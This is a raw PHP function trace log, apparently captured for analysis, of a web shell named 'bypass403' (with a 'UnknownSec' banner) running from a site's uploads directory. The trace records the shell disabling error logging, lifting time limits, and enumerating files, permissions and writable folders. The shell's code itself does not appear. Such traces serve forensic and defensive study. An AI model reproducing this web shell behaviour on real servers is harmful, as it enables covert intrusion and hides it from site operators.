1 A /var/www/html/uploads/bypass403.PHP 210 $dir = '/var/www/html/uploads'
2 23 0 0.001799 522464 str_replace 0 /var/www/html/uploads/bypass403.PHP 212 3 '\\' '/' '/var/www/html/uploads'
2 23 1 0.001812 522560
2 23 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bypass403.PHP 212 $dir = '/var/www/html/uploads'
2 24 0 0.001836 522464 explode 0 /var/www/html/uploads/bypass403.PHP 213 2 '/' '/var/www/html/uploads'
2 24 1 0.001850 523040
2 24 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bypass403.PHP 213 $scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bypass403.PHP 214 $i = 0
1 A /var/www/html/uploads/bypass403.PHP 214 $i++
2 25 0 0.001908 522968 scandir 0 /var/www/html/uploads/bypass403.PHP 628 1 '/var/www/html/uploads'
2 25 1 0.001938 523592
2 25 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'bypass403.PHP', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/bypass403.PHP 628 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'bypass403.PHP', 4 => 'data', 5 => 'prepend.php']
2 26 0 0.001975 523560 getcwd 0 /var/www/html/uploads/bypass403.PHP 629 0
2 26 1 0.001988 523608
2 26 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bypass403.PHP 629 $pa = '/var/www/html/uploads'
2 27 0 0.002013 523608 filemtime 0 /var/www/html/uploads/bypass403.PHP 643 1 '/var/www/html/uploads/.'
2 27 1 0.002028 523648
2 27 R 1676244318
2 28 0 0.002041 523560 date 0 /var/www/html/uploads/bypass403.PHP 643 2 'Y-m-d' 1676244318
2 28 1 0.002107 525952
2 28 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 643 $dt = '2023-02-12'
2 29 0 0.002136 525928 is_dir 0 /var/www/html/uploads/bypass403.PHP 644 1 '/var/www/html/uploads/.'
2 29 1 0.002148 525968
2 29 R TRUE
2 30 0 0.002162 525936 filemtime 0 /var/www/html/uploads/bypass403.PHP 643 1 '/var/www/html/uploads/..'
2 30 1 0.002177 525984
2 30 R 1676244318
2 31 0 0.002191 525888 date 0 /var/www/html/uploads/bypass403.PHP 643 2 'Y-m-d' 1676244318
2 31 1 0.002221 526216
2 31 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 643 $dt = '2023-02-12'
2 32 0 0.002244 525944 is_dir 0 /var/www/html/uploads/bypass403.PHP 644 1 '/var/www/html/uploads/..'
2 32 1 0.002256 525984
2 32 R TRUE
2 33 0 0.002270 525944 filemtime 0 /var/www/html/uploads/bypass403.PHP 643 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.002285 525984
2 33 R 1676244318
2 34 0 0.002298 525888 date 0 /var/www/html/uploads/bypass403.PHP 643 2 'Y-m-d' 1676244318
2 34 1 0.002327 526216
2 34 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 643 $dt = '2023-02-12'
2 35 0 0.002357 525944 is_dir 0 /var/www/html/uploads/bypass403.PHP 644 1 '/var/www/html/uploads/.htaccess'
2 35 1 0.002370 525984
2 35 R FALSE
2 36 0 0.002383 525952 filemtime 0 /var/www/html/uploads/bypass403.PHP 643 1 '/var/www/html/uploads/bypass403.PHP'
2 36 1 0.002397 526000
2 36 R 1676244318
2 37 0 0.002410 525896 date 0 /var/www/html/uploads/bypass403.PHP 643 2 'Y-m-d' 1676244318
2 37 1 0.002440 526224
2 37 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 643 $dt = '2023-02-12'
2 38 0 0.002463 525960 is_dir 0 /var/www/html/uploads/bypass403.PHP 644 1 '/var/www/html/uploads/bypass403.PHP'
2 38 1 0.002475 526000
2 38 R FALSE
2 39 0 0.002488 525952 filemtime 0 /var/www/html/uploads/bypass403.PHP 643 1 '/var/www/html/uploads/data'
2 39 1 0.002503 525984
2 39 R 1676244318
2 40 0 0.002516 525888 date 0 /var/www/html/uploads/bypass403.PHP 643 2 'Y-m-d' 1676244318
2 40 1 0.002545 526216
2 40 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 643 $dt = '2023-02-12'
2 41 0 0.002568 525944 is_dir 0 /var/www/html/uploads/bypass403.PHP 644 1 '/var/www/html/uploads/data'
2 41 1 0.002580 525984
2 41 R TRUE
2 42 0 0.002594 525944 is_writable 0 /var/www/html/uploads/bypass403.PHP 651 1 '/var/www/html/uploads/data'
2 42 1 0.002610 525984
2 42 R TRUE
2 43 0 0.002623 525944 p 1 /var/www/html/uploads/bypass403.PHP 653 1 '/var/www/html/uploads/data'
3 44 0 0.002635 525944 fileperms 0 /var/www/html/uploads/bypass403.PHP 118 1 '/var/www/html/uploads/data'
3 44 1 0.002647 525984
3 44 R 16895
2 A /var/www/html/uploads/bypass403.PHP 118 $p = 16895
2 A /var/www/html/uploads/bypass403.PHP 128 $i = 'd'
2 A /var/www/html/uploads/bypass403.PHP 136 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 137 $i .= 'w'
2 A /var/www/html/uploads/bypass403.PHP 140 $i .= 'x'
2 A /var/www/html/uploads/bypass403.PHP 141 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 142 $i .= 'w'
2 A /var/www/html/uploads/bypass403.PHP 145 $i .= 'x'
2 A /var/www/html/uploads/bypass403.PHP 146 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 147 $i .= 'w'
2 A /var/www/html/uploads/bypass403.PHP 150 $i .= 'x'
2 43 1 0.002767 525984
2 43 R 'drwxrwxrwx'
2 45 0 0.002781 525944 is_writable 0 /var/www/html/uploads/bypass403.PHP 654 1 '/var/www/html/uploads/data'
2 45 1 0.002797 525984
2 45 R TRUE
2 46 0 0.002811 525952 filemtime 0 /var/www/html/uploads/bypass403.PHP 643 1 '/var/www/html/uploads/prepend.php'
2 46 1 0.002827 526000
2 46 R 1676244318
2 47 0 0.002840 525896 date 0 /var/www/html/uploads/bypass403.PHP 643 2 'Y-m-d' 1676244318
2 47 1 0.002870 526224
2 47 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 643 $dt = '2023-02-12'
2 48 0 0.002894 525960 is_dir 0 /var/www/html/uploads/bypass403.PHP 644 1 '/var/www/html/uploads/prepend.php'
2 48 1 0.002908 526000
2 48 R FALSE
2 49 0 0.002921 525944 filemtime 0 /var/www/html/uploads/bypass403.PHP 675 1 '/var/www/html/uploads/.'
2 49 1 0.002935 525968
2 49 R 1676244318
2 50 0 0.002948 525880 date 0 /var/www/html/uploads/bypass403.PHP 675 2 'Y-m-d' 1676244318
2 50 1 0.002978 526208
2 50 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 675 $ft = '2023-02-12'
2 51 0 0.003002 526184 is_file 0 /var/www/html/uploads/bypass403.PHP 676 1 '/var/www/html/uploads/.'
2 51 1 0.003014 526224
2 51 R FALSE
2 52 0 0.003027 526192 filemtime 0 /var/www/html/uploads/bypass403.PHP 675 1 '/var/www/html/uploads/..'
2 52 1 0.003041 526240
2 52 R 1676244318
2 53 0 0.003055 526144 date 0 /var/www/html/uploads/bypass403.PHP 675 2 'Y-m-d' 1676244318
2 53 1 0.003084 526472
2 53 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 675 $ft = '2023-02-12'
2 54 0 0.003108 526200 is_file 0 /var/www/html/uploads/bypass403.PHP 676 1 '/var/www/html/uploads/..'
2 54 1 0.003120 526240
2 54 R FALSE
2 55 0 0.003133 526200 filemtime 0 /var/www/html/uploads/bypass403.PHP 675 1 '/var/www/html/uploads/.htaccess'
2 55 1 0.003147 526240
2 55 R 1676244318
2 56 0 0.003163 526144 date 0 /var/www/html/uploads/bypass403.PHP 675 2 'Y-m-d' 1676244318
2 56 1 0.003193 526472
2 56 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 675 $ft = '2023-02-12'
2 57 0 0.003216 526200 is_file 0 /var/www/html/uploads/bypass403.PHP 676 1 '/var/www/html/uploads/.htaccess'
2 57 1 0.003229 526240
2 57 R TRUE
2 58 0 0.003242 526200 filesize 0 /var/www/html/uploads/bypass403.PHP 677 1 '/var/www/html/uploads/.htaccess'
2 58 1 0.003255 526240
2 58 R 64
1 A /var/www/html/uploads/bypass403.PHP 677 $s = 0.0625
2 59 0 0.003279 526144 round 0 /var/www/html/uploads/bypass403.PHP 678 2 0.0625 3
2 59 1 0.003293 526216
2 59 R 0.063
1 A /var/www/html/uploads/bypass403.PHP 678 $s = 0.063
1 A /var/www/html/uploads/bypass403.PHP 682 $s = '0.063 KB'
2 60 0 0.003329 526240 is_writable 0 /var/www/html/uploads/bypass403.PHP 690 1 '/var/www/html/uploads/.htaccess'
2 60 1 0.003345 526280
2 60 R FALSE
2 61 0 0.003358 526240 is_readable 0 /var/www/html/uploads/bypass403.PHP 691 1 '/var/www/html/uploads/.htaccess'
2 61 1 0.003373 526280
2 61 R TRUE
2 62 0 0.003386 526240 p 1 /var/www/html/uploads/bypass403.PHP 692 1 '/var/www/html/uploads/.htaccess'
3 63 0 0.003399 526240 fileperms 0 /var/www/html/uploads/bypass403.PHP 118 1 '/var/www/html/uploads/.htaccess'
3 63 1 0.003412 526280
3 63 R 33188
2 A /var/www/html/uploads/bypass403.PHP 118 $p = 33188
2 A /var/www/html/uploads/bypass403.PHP 124 $i = '-'
2 A /var/www/html/uploads/bypass403.PHP 136 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 137 $i .= 'w'
2 A /var/www/html/uploads/bypass403.PHP 140 $i .= '-'
2 A /var/www/html/uploads/bypass403.PHP 141 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 142 $i .= '-'
2 A /var/www/html/uploads/bypass403.PHP 145 $i .= '-'
2 A /var/www/html/uploads/bypass403.PHP 146 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 147 $i .= '-'
2 A /var/www/html/uploads/bypass403.PHP 150 $i .= '-'
2 62 1 0.003530 526280
2 62 R '-rw-r--r--'
2 64 0 0.003544 526240 is_writable 0 /var/www/html/uploads/bypass403.PHP 693 1 '/var/www/html/uploads/.htaccess'
2 64 1 0.003559 526280
2 64 R FALSE
2 65 0 0.003573 526240 is_readable 0 /var/www/html/uploads/bypass403.PHP 693 1 '/var/www/html/uploads/.htaccess'
2 65 1 0.003587 526280
2 65 R TRUE
2 66 0 0.003606 526360 filemtime 0 /var/www/html/uploads/bypass403.PHP 675 1 '/var/www/html/uploads/bypass403.PHP'
2 66 1 0.003621 526408
2 66 R 1676244318
2 67 0 0.003633 526304 date 0 /var/www/html/uploads/bypass403.PHP 675 2 'Y-m-d' 1676244318
2 67 1 0.003664 526632
2 67 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 675 $ft = '2023-02-12'
2 68 0 0.003688 526368 is_file 0 /var/www/html/uploads/bypass403.PHP 676 1 '/var/www/html/uploads/bypass403.PHP'
2 68 1 0.003701 526408
2 68 R TRUE
2 69 0 0.003714 526368 filesize 0 /var/www/html/uploads/bypass403.PHP 677 1 '/var/www/html/uploads/bypass403.PHP'
2 69 1 0.003726 526408
2 69 R 21707
1 A /var/www/html/uploads/bypass403.PHP 677 $s = 21.1982421875
2 70 0 0.003750 526264 round 0 /var/www/html/uploads/bypass403.PHP 678 2 21.1982421875 3
2 70 1 0.003763 526336
2 70 R 21.198
1 A /var/www/html/uploads/bypass403.PHP 678 $s = 21.198
1 A /var/www/html/uploads/bypass403.PHP 682 $s = '21.198 KB'
2 71 0 0.003798 526368 is_writable 0 /var/www/html/uploads/bypass403.PHP 690 1 '/var/www/html/uploads/bypass403.PHP'
2 71 1 0.003814 526408
2 71 R FALSE
2 72 0 0.003827 526368 is_readable 0 /var/www/html/uploads/bypass403.PHP 691 1 '/var/www/html/uploads/bypass403.PHP'
2 72 1 0.003840 526408
2 72 R TRUE
2 73 0 0.003853 526368 p 1 /var/www/html/uploads/bypass403.PHP 692 1 '/var/www/html/uploads/bypass403.PHP'
3 74 0 0.003865 526368 fileperms 0 /var/www/html/uploads/bypass403.PHP 118 1 '/var/www/html/uploads/bypass403.PHP'
3 74 1 0.003877 526408
3 74 R 33204
2 A /var/www/html/uploads/bypass403.PHP 118 $p = 33204
2 A /var/www/html/uploads/bypass403.PHP 124 $i = '-'
2 A /var/www/html/uploads/bypass403.PHP 136 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 137 $i .= 'w'
2 A /var/www/html/uploads/bypass403.PHP 140 $i .= '-'
2 A /var/www/html/uploads/bypass403.PHP 141 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 142 $i .= 'w'
2 A /var/www/html/uploads/bypass403.PHP 145 $i .= '-'
2 A /var/www/html/uploads/bypass403.PHP 146 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 147 $i .= '-'
2 A /var/www/html/uploads/bypass403.PHP 150 $i .= '-'
2 73 1 0.003999 526408
2 73 R '-rw-rw-r--'
2 75 0 0.004013 526368 is_writable 0 /var/www/html/uploads/bypass403.PHP 693 1 '/var/www/html/uploads/bypass403.PHP'
2 75 1 0.004028 526408
2 75 R FALSE
2 76 0 0.004041 526368 is_readable 0 /var/www/html/uploads/bypass403.PHP 693 1 '/var/www/html/uploads/bypass403.PHP'
2 76 1 0.004055 526408
2 76 R TRUE
2 77 0 0.004069 526360 filemtime 0 /var/www/html/uploads/bypass403.PHP 675 1 '/var/www/html/uploads/data'
2 77 1 0.004084 526392
2 77 R 1676244318
2 78 0 0.004097 526296 date 0 /var/www/html/uploads/bypass403.PHP 675 2 'Y-m-d' 1676244318
2 78 1 0.004127 526624
2 78 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 675 $ft = '2023-02-12'
2 79 0 0.004151 526352 is_file 0 /var/www/html/uploads/bypass403.PHP 676 1 '/var/www/html/uploads/data'
2 79 1 0.004163 526392
2 79 R FALSE
2 80 0 0.004176 526360 filemtime 0 /var/www/html/uploads/bypass403.PHP 675 1 '/var/www/html/uploads/prepend.php'
2 80 1 0.004192 526408
2 80 R 1676244318
2 81 0 0.004205 526304 date 0 /var/www/html/uploads/bypass403.PHP 675 2 'Y-m-d' 1676244318
2 81 1 0.004234 526632
2 81 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.PHP 675 $ft = '2023-02-12'
2 82 0 0.004258 526368 is_file 0 /var/www/html/uploads/bypass403.PHP 676 1 '/var/www/html/uploads/prepend.php'
2 82 1 0.004271 526408
2 82 R TRUE
2 83 0 0.004284 526368 filesize 0 /var/www/html/uploads/bypass403.PHP 677 1 '/var/www/html/uploads/prepend.php'
2 83 1 0.004297 526408
2 83 R 57
1 A /var/www/html/uploads/bypass403.PHP 677 $s = 0.0556640625
2 84 0 0.004320 526264 round 0 /var/www/html/uploads/bypass403.PHP 678 2 0.0556640625 3
2 84 1 0.004333 526336
2 84 R 0.056
1 A /var/www/html/uploads/bypass403.PHP 678 $s = 0.056
1 A /var/www/html/uploads/bypass403.PHP 682 $s = '0.056 KB'
2 85 0 0.004369 526368 is_writable 0 /var/www/html/uploads/bypass403.PHP 690 1 '/var/www/html/uploads/prepend.php'
2 85 1 0.004384 526408
2 85 R FALSE
2 86 0 0.004397 526368 is_readable 0 /var/www/html/uploads/bypass403.PHP 691 1 '/var/www/html/uploads/prepend.php'
2 86 1 0.004413 526408
2 86 R TRUE
2 87 0 0.004425 526368 p 1 /var/www/html/uploads/bypass403.PHP 692 1 '/var/www/html/uploads/prepend.php'
3 88 0 0.004438 526368 fileperms 0 /var/www/html/uploads/bypass403.PHP 118 1 '/var/www/html/uploads/prepend.php'
3 88 1 0.004451 526408
3 88 R 33261
2 A /var/www/html/uploads/bypass403.PHP 118 $p = 33261
2 A /var/www/html/uploads/bypass403.PHP 124 $i = '-'
2 A /var/www/html/uploads/bypass403.PHP 136 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 137 $i .= 'w'
2 A /var/www/html/uploads/bypass403.PHP 140 $i .= 'x'
2 A /var/www/html/uploads/bypass403.PHP 141 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 142 $i .= '-'
2 A /var/www/html/uploads/bypass403.PHP 145 $i .= 'x'
2 A /var/www/html/uploads/bypass403.PHP 146 $i .= 'r'
2 A /var/www/html/uploads/bypass403.PHP 147 $i .= '-'
2 A /var/www/html/uploads/bypass403.PHP 150 $i .= 'x'
2 87 1 0.004570 526408
2 87 R '-rwxr-xr-x'
2 89 0 0.004584 526368 is_writable 0 /var/www/html/uploads/bypass403.PHP 693 1 '/var/www/html/uploads/prepend.php'
2 89 1 0.004599 526408
2 89 R FALSE
2 90 0 0.004612 526368 is_readable 0 /var/www/html/uploads/bypass403.PHP 693 1 '/var/www/html/uploads/prepend.php'
2 90 1 0.004628 526408
2 90 R TRUE
2 91 0 0.004642 526304 date 0 /var/www/html/uploads/bypass403.PHP 720 1 'Y'
2 91 1 0.004670 526592
2 91 R '2023'
1 3 1 0.004685 526304
0.004720 362632
TRACE END [2023-02-12 21:25:44.003420]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:25:27.918076]
1 0 1 0.000184 393576
1 3 0 0.000830 521568 {main} 1 /var/www/html/uploads/bypass403.phtml 0 0
2 4 0 0.000848 521568 set_time_limit 0 /var/www/html/uploads/bypass403.phtml 7 1 0
2 4 1 0.000866 521632
2 4 R FALSE
2 5 0 0.000880 521600 error_reporting 0 /var/www/html/uploads/bypass403.phtml 8 1 0
2 5 1 0.000894 521640
2 5 R 22527
2 6 0 0.000907 521600 ini_set 0 /var/www/html/uploads/bypass403.phtml 9 2 'error_log' NULL
2 6 1 0.000923 521672
2 6 R ''
2 7 0 0.000936 521600 ini_set 0 /var/www/html/uploads/bypass403.phtml 10 2 'log_errors' 0
2 7 1 0.000951 521672
2 7 R '1'
2 8 0 0.000963 521600 ini_set 0 /var/www/html/uploads/bypass403.phtml 11 2 'max_execution_time' 0
2 8 1 0.000977 521640
2 8 R '0'
2 9 0 0.000990 521568 ini_set 0 /var/www/html/uploads/bypass403.phtml 12 2 'output_buffering' 0
2 9 1 0.001004 521640
2 9 R FALSE
2 10 0 0.001017 521568 ini_set 0 /var/www/html/uploads/bypass403.phtml 13 2 'display_errors' 0
2 10 1 0.001032 521640
2 10 R ''
1 A /var/www/html/uploads/bypass403.phtml 15 $▛ = 'UnknownSec'
1 A /var/www/html/uploads/bypass403.phtml 16 $▘ = '<style>table{display:none;}</style>'
2 11 0 0.001071 521568 get_magic_quotes_gpc 0 /var/www/html/uploads/bypass403.phtml 25 0
2 11 1 0.001084 521568
2 11 R FALSE
2 12 0 0.001099 521568 htmlspecialchars 0 /var/www/html/uploads/bypass403.phtml 114 1 NULL
2 12 1 0.001113 521760
2 12 R ''
1 A /var/www/html/uploads/bypass403.phtml 114 $cmd = ''
2 13 0 0.001136 521728 htmlspecialchars 0 /var/www/html/uploads/bypass403.phtml 115 1 NULL
2 13 1 0.001149 521920
2 13 R ''
1 A /var/www/html/uploads/bypass403.phtml 115 $method = ''
2 14 0 0.001175 521888 getcwd 0 /var/www/html/uploads/bypass403.phtml 174 0
2 14 1 0.001189 521936
2 14 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bypass403.phtml 174 $path = '/var/www/html/uploads'
2 15 0 0.001214 521936 str_replace 0 /var/www/html/uploads/bypass403.phtml 176 3 '\\' '/' '/var/www/html/uploads'
2 15 1 0.001230 522032
2 15 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bypass403.phtml 176 $path = '/var/www/html/uploads'
2 16 0 0.001254 521936 explode 0 /var/www/html/uploads/bypass403.phtml 177 2 '/' '/var/www/html/uploads'
2 16 1 0.001269 522512
2 16 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bypass403.phtml 177 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bypass403.phtml 178 $id = 0
1 A /var/www/html/uploads/bypass403.phtml 180 $a = TRUE
1 A /var/www/html/uploads/bypass403.phtml 178 $id = 1
1 A /var/www/html/uploads/bypass403.phtml 186 $i = 0
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 178 $id = 2
1 A /var/www/html/uploads/bypass403.phtml 186 $i = 0
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 178 $id = 3
1 A /var/www/html/uploads/bypass403.phtml 186 $i = 0
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 178 $id = 4
1 A /var/www/html/uploads/bypass403.phtml 186 $i = 0
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
1 A /var/www/html/uploads/bypass403.phtml 186 $i++
2 17 0 0.001509 522440 p 1 /var/www/html/uploads/bypass403.phtml 192 1 '/var/www/html/uploads'
3 18 0 0.001522 522440 fileperms 0 /var/www/html/uploads/bypass403.phtml 118 1 '/var/www/html/uploads'
3 18 1 0.001544 522504
3 18 R 16895
2 A /var/www/html/uploads/bypass403.phtml 118 $p = 16895
2 A /var/www/html/uploads/bypass403.phtml 128 $i = 'd'
2 A /var/www/html/uploads/bypass403.phtml 136 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 137 $i .= 'w'
2 A /var/www/html/uploads/bypass403.phtml 140 $i .= 'x'
2 A /var/www/html/uploads/bypass403.phtml 141 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 142 $i .= 'w'
2 A /var/www/html/uploads/bypass403.phtml 145 $i .= 'x'
2 A /var/www/html/uploads/bypass403.phtml 146 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 147 $i .= 'w'
2 A /var/www/html/uploads/bypass403.phtml 150 $i .= 'x'
2 17 1 0.001664 522504
2 17 R 'drwxrwxrwx'
2 19 0 0.001677 522504 ▟ 1 /var/www/html/uploads/bypass403.phtml 192 2 '/var/www/html/uploads' 'drwxrwxrwx'
3 20 0 0.001691 522504 getcwd 0 /var/www/html/uploads/bypass403.phtml 35 0
3 20 1 0.001703 522552
3 20 R '/var/www/html/uploads'
2 A /var/www/html/uploads/bypass403.phtml 35 $▚ = '/var/www/html/uploads'
3 21 0 0.001727 522552 is_writable 0 /var/www/html/uploads/bypass403.phtml 37 1 '/var/www/html/uploads'
3 21 1 0.001744 522592
3 21 R TRUE
2 19 1 0.001758 522568
2 19 R '<font color=\'green\'>drwxrwxrwx</font>'
2 22 0 0.001776 522464 getcwd 0 /var/www/html/uploads/bypass403.phtml 210 0
2 22 1 0.001788 522512
2 22 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bypass403.phtml 210 $dir = '/var/www/html/uploads'
2 23 0 0.001816 522512 str_replace 0 /var/www/html/uploads/bypass403.phtml 212 3 '\\' '/' '/var/www/html/uploads'
2 23 1 0.001867 522608
2 23 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bypass403.phtml 212 $dir = '/var/www/html/uploads'
2 24 0 0.001893 522512 explode 0 /var/www/html/uploads/bypass403.phtml 213 2 '/' '/var/www/html/uploads'
2 24 1 0.001907 523088
2 24 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bypass403.phtml 213 $scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/bypass403.phtml 214 $i = 0
1 A /var/www/html/uploads/bypass403.phtml 214 $i++
2 25 0 0.001966 523016 scandir 0 /var/www/html/uploads/bypass403.phtml 628 1 '/var/www/html/uploads'
2 25 1 0.001999 523640
2 25 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'bypass403.phtml', 4 => 'data', 5 => 'prepend.php']
1 A /var/www/html/uploads/bypass403.phtml 628 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'bypass403.phtml', 4 => 'data', 5 => 'prepend.php']
2 26 0 0.002037 523608 getcwd 0 /var/www/html/uploads/bypass403.phtml 629 0
2 26 1 0.002050 523656
2 26 R '/var/www/html/uploads'
1 A /var/www/html/uploads/bypass403.phtml 629 $pa = '/var/www/html/uploads'
2 27 0 0.002075 523656 filemtime 0 /var/www/html/uploads/bypass403.phtml 643 1 '/var/www/html/uploads/.'
2 27 1 0.002091 523696
2 27 R 1676247902
2 28 0 0.002104 523608 date 0 /var/www/html/uploads/bypass403.phtml 643 2 'Y-m-d' 1676247902
2 28 1 0.002160 526000
2 28 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 643 $dt = '2023-02-12'
2 29 0 0.002187 525976 is_dir 0 /var/www/html/uploads/bypass403.phtml 644 1 '/var/www/html/uploads/.'
2 29 1 0.002200 526016
2 29 R TRUE
2 30 0 0.002214 525984 filemtime 0 /var/www/html/uploads/bypass403.phtml 643 1 '/var/www/html/uploads/..'
2 30 1 0.002230 526032
2 30 R 1676247901
2 31 0 0.002243 525936 date 0 /var/www/html/uploads/bypass403.phtml 643 2 'Y-m-d' 1676247901
2 31 1 0.002273 526264
2 31 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 643 $dt = '2023-02-12'
2 32 0 0.002297 525992 is_dir 0 /var/www/html/uploads/bypass403.phtml 644 1 '/var/www/html/uploads/..'
2 32 1 0.002310 526032
2 32 R TRUE
2 33 0 0.002323 525992 filemtime 0 /var/www/html/uploads/bypass403.phtml 643 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.002338 526032
2 33 R 1676247902
2 34 0 0.002350 525936 date 0 /var/www/html/uploads/bypass403.phtml 643 2 'Y-m-d' 1676247902
2 34 1 0.002380 526264
2 34 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 643 $dt = '2023-02-12'
2 35 0 0.002403 525992 is_dir 0 /var/www/html/uploads/bypass403.phtml 644 1 '/var/www/html/uploads/.htaccess'
2 35 1 0.002422 526032
2 35 R FALSE
2 36 0 0.002436 526000 filemtime 0 /var/www/html/uploads/bypass403.phtml 643 1 '/var/www/html/uploads/bypass403.phtml'
2 36 1 0.002451 526048
2 36 R 1676247902
2 37 0 0.002464 525944 date 0 /var/www/html/uploads/bypass403.phtml 643 2 'Y-m-d' 1676247902
2 37 1 0.002493 526272
2 37 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 643 $dt = '2023-02-12'
2 38 0 0.002516 526008 is_dir 0 /var/www/html/uploads/bypass403.phtml 644 1 '/var/www/html/uploads/bypass403.phtml'
2 38 1 0.002529 526048
2 38 R FALSE
2 39 0 0.002542 526000 filemtime 0 /var/www/html/uploads/bypass403.phtml 643 1 '/var/www/html/uploads/data'
2 39 1 0.002557 526032
2 39 R 1676247902
2 40 0 0.002569 525936 date 0 /var/www/html/uploads/bypass403.phtml 643 2 'Y-m-d' 1676247902
2 40 1 0.002598 526264
2 40 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 643 $dt = '2023-02-12'
2 41 0 0.002621 525992 is_dir 0 /var/www/html/uploads/bypass403.phtml 644 1 '/var/www/html/uploads/data'
2 41 1 0.002634 526032
2 41 R TRUE
2 42 0 0.002648 525992 is_writable 0 /var/www/html/uploads/bypass403.phtml 651 1 '/var/www/html/uploads/data'
2 42 1 0.002664 526032
2 42 R TRUE
2 43 0 0.002678 525992 p 1 /var/www/html/uploads/bypass403.phtml 653 1 '/var/www/html/uploads/data'
3 44 0 0.002691 525992 fileperms 0 /var/www/html/uploads/bypass403.phtml 118 1 '/var/www/html/uploads/data'
3 44 1 0.002704 526032
3 44 R 16895
2 A /var/www/html/uploads/bypass403.phtml 118 $p = 16895
2 A /var/www/html/uploads/bypass403.phtml 128 $i = 'd'
2 A /var/www/html/uploads/bypass403.phtml 136 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 137 $i .= 'w'
2 A /var/www/html/uploads/bypass403.phtml 140 $i .= 'x'
2 A /var/www/html/uploads/bypass403.phtml 141 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 142 $i .= 'w'
2 A /var/www/html/uploads/bypass403.phtml 145 $i .= 'x'
2 A /var/www/html/uploads/bypass403.phtml 146 $i .= 'r'
2 A /var/www/html/uploads/bypass403.phtml 147 $i .= 'w'
2 A /var/www/html/uploads/bypass403.phtml 150 $i .= 'x'
2 43 1 0.002822 526032
2 43 R 'drwxrwxrwx'
2 45 0 0.002836 525992 is_writable 0 /var/www/html/uploads/bypass403.phtml 654 1 '/var/www/html/uploads/data'
2 45 1 0.002852 526032
2 45 R TRUE
2 46 0 0.002866 526000 filemtime 0 /var/www/html/uploads/bypass403.phtml 643 1 '/var/www/html/uploads/prepend.php'
2 46 1 0.002881 526048
2 46 R 1676247902
2 47 0 0.002900 525944 date 0 /var/www/html/uploads/bypass403.phtml 643 2 'Y-m-d' 1676247902
2 47 1 0.002931 526272
2 47 R '2023-02-12'
1 A /var/www/html/uploads/bypass403.phtml 643 $dt = '2023-02-12'
